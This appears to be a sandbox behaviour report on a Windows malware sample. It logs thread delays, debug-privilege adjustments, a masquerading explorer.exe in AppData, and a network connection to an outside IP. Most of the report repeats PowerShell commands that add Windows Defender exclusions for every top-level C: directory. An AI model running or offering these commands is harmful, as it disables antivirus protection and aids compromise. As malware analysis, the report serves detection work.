                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 30000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 600000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599766
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599579
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599422
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599289
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599157
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599008
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 598823
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 598610
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 598453
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 3600000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 598012
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 597641
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 300000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 597422
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 597277
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 597000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596844
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596704
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596547
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596384
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596219
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596037
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595860
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595655
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595527
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595396
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595235
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594922
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594645
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594513
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594389
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594281
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594125
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593919
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593790
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593671
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593562
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593453
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593336
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593208
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593066
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592929
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592815
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592701
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592594
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592466
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592359
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592204
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592047
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591923
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591812
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591688
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591563
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591453
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591344
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591222
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591094
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590979
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590874
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590750
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590579
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590468
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590358
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590215
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590006
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589750
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589488
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589344
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589233
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589104
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588948
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588829
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588718
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588610
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588485
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588360
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588235
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588100
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587978
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587875
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587755
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587641
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587532
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587307
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586768
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586547
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586438
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586313
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeNetwork Connect: 45.88.91.89 80
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
